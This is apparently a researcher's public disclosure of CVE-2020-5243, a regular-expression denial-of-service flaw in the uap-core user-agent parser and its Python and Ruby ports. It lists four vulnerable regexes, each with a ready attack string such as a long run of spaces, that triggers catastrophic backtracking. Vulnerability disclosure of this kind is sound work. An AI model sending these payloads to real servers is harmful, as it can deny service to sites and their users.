User-agent parsing REDoS (CVE‑2020‑5243)

Due to my research into Regular Expression Denial-of-Service (REDoS), I found and (after bug bounties) finally publicly reported CVE-2020-5243 in uap-core. Dependent packages uap-python, uap-ruby, etc are/were vulnerable.

What’s wrong

Websites often like to know what browser / OS / device and versions thereof their visitors are using. One way to determine this is by looking at the User-Agent header (UA) sent by the customer. Unfortunately, UAs aren’t simple to parse into browser, OS, device. Take a UA of Chrome on Ubuntu:

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36

Why Safari, Gecko, Mozilla? UA-sniffing used to be used to determine which version of website the server would send. So if IE wanted the fancy version destined for Mozilla users, it had to send the string Mozilla in its UA. This kept happening so that the UA is littered with junk.

And Gecko was good, and IE was not […] and Gecko was given good web code, and other browsers were not. And the followers of Linux were much sorrowed, because they had built Konqueror, whose engine was KHTML, which they thought was as good as Gecko, but it was not Gecko, and so was not given the good pages, and so Konquerer began to pretend to be “like Gecko” to get the good pages, and called itself Mozilla/5.0 (compatible; Konqueror/3.2; FreeBSD) (KHTML, like Gecko) and there was much confusion. History of browser user-agent string

In my opinion, the best way to parse UAs (if it’s actually necessary) would be to use a big decision tree of if/else branches which searches for the presence or absence of substrings within the UA.

What uap-core and it’s derivatives (uap-python, uap-ruby, etc) do instead is run through a massive list of regular expressions. Unfortunately, regular expressions can be difficult to write correctly, reason about, code review and test. It’s easy to write an inefficient regular expression which matches what you want but has catastrophic worst-case performance on certain pathological input strings.

Vulnerable regexes

Each vulnerable regular expression reported here contains 3 overlapping capture groups. Backtracking has approximately cubic time complexity with respect to the length of the user-agent string.

Regex 1:

\bSmartWatch *\( *([^;]+) *; *([^;]+) *;

is vulnerable in portion ' *([^;]+) *' and can be attacked with a long string of spaces

"SmartWatch(" + (" " * 3500) + "z"
SmartWatch(                                   z

Regex 2:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

is vulnerable in portion '\d+[^\);]+[^\);]*' and can be attacked with

";A Build HuaweiA" + ("4" * 3500) + "z"

Regex 3:

(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(LG)E *; *([^;]*) *;[^;]*;[^;]*;\)

is vulnerable in portion ' *([^;]*) *' and can be attacked with

"HbbTV/0.0.0 (;LGE;" + (" " * 3500) + "z"

Regex 4:

(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(?:CUS:([^;]*)|([^;]+)) *; *([^;]*) *;.*;

is vulnerable in portions ' *(?:CUS:([^;]*)|([^;]+)) *' and ' *([^;]*) *' and can be attacked with

"HbbTV/0.0.0 (;CUS:;" + (" " * 3500) + "z"
"HbbTV/0.0.0 (;" + (" " * 3500) + "z"
"HbbTV/0.0.0 (;z;" + (" " * 3500) + "z"